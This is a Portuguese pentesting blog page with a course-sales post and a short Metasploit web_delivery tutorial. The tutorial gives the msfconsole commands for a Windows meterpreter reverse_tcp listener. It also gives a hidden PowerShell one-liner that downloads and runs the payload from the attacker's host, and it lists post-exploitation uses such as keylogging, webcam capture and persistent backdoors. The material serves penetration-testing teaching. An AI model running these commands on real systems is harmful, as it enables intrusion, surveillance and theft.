20 de maio de 2016

Venda de cursos já realizados

Pessoal, sei que muita gente as vezes acaba perdendo uma turma ou outra dos cursos que realizo, seja por falta de tempo, ou dinheiro, naquele momento em que estou formando as turmas. 

Por conta disso é possível adquirir, após a realização das turmas, o material de cada uma delas. No material sempre estão inclusos os slides, os vídeos e os arquivos utilizados em cada curso, e em alguns inclusive disponibilizo a apostila e máquinas virtuais para os laboratórios (esses dois últimos, nem todos os cursos tem, mas todos tem os vídeos e slides).

Quando o aluno adquire o material do curso, é possível ao final de seus estudos realizar uma avaliação prática para receber o certificado de conclusão do mesmo, caso o aluno tenha interesse.

Os cursos atualmente disponíveis para aquisição são os seguintes, com seus respectivos valores a serem pagos via Paypal em até 3x:

- Hardening de Servidores Linux = 450,00
- Pentest em Redes = 710,00
- Engenharia Social = 400,00
- Pentest em Aplicações WEB = 640,00
- Perícia Forense Digital = 710,00
- Fundamentos de Programação com Assembly e C = 450,00
- Engenharia Reversa e Análise de Malwares = 800,00
- Pentest Avançado e Introdução à Exploração de Softwares = 800,00
- Programação para Pentesters = 800,00

Para pagamentos à vista, é possível um desconto de 5%. E caso adquira mais de um curso, podemos negociar outros descontos.

Quem tiver interesse, basta enviar um e-mail para luizwt at gmail.com.

16 de maio de 2016

Módulo Web Delivery do Metasploit

Muitas vezes estamos em situações em que temos acesso à uma máquina que precisamos explorar, mas sem as ferramentas adequadas ou necessárias naquele momento. Um dos módulos do Metasploit que pode nos ajudar em cenários assim é o web delivery, que permite que remotamente nos conectemos à um IP e tenhamos de retorno um shell, seja command.com ou meterpreter no caso do Metasploit.

Entretanto, é necessário que deixemos nossa máquina com o Metasploit (possivelmente na nuvem) já configurada aguardando a conexão.

Nesse exemplo, vamos ver como compromenter uma máquina Windows, entregando um shell meterpreter via PowerShell (poderia ser via Python ou PHP também).

Em primeiro lugar precisamos entrar no msfconsole e digitar os seguintes comandos:
  • use exploit/multi/script/web_delivery
  • set lhost [Kali IP Address]
  • set lport 4444
Quando digitamos o comando "show targets", vemos as opções de entrega do shell, que em nosso caso será PowerShell:

Então, para selecionar o tipo de entrega e o shell que será entregue, digitamos os dois seguintes comandos:

  • set target 2
  • set payload windows/meterpreter/reverse_tcp
E então executamos o comando "exploit", para colocar nossa máquina numa condição de "listening", que é quando fica aguardando alguém conectar-se para entregar o payload:

E então, na máquina alvo, onde temos acesso físico, digitamos o comando abaixo para forçar a conexão e a entrega do payload:
  • powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.39:8080/eAtfMo'))
E então, na máquina onde temos o Metasploit, veremos uma tentativa de conexão, e uma sessão sendo criada:

E então, ou você já terá um shell via meterpreter com o prompt "meterpreter>" aberto, ou simplesmente precisará digitar o comando "sessions -i [numero-da-sessão]" para conectar-se e começar a brincadeira.

A partir daí, terá todo o poder do meterpreter disponível em suas mãos: keylogger, screenshot, ativar webcam para vídeos e fotos, network sniffing, escalada de privilégios, criar backdoor persistente e etc. Quando quiser finalizar a sessão, basta digitar "exit" e cair de novo no msfconsole.

Have some fun!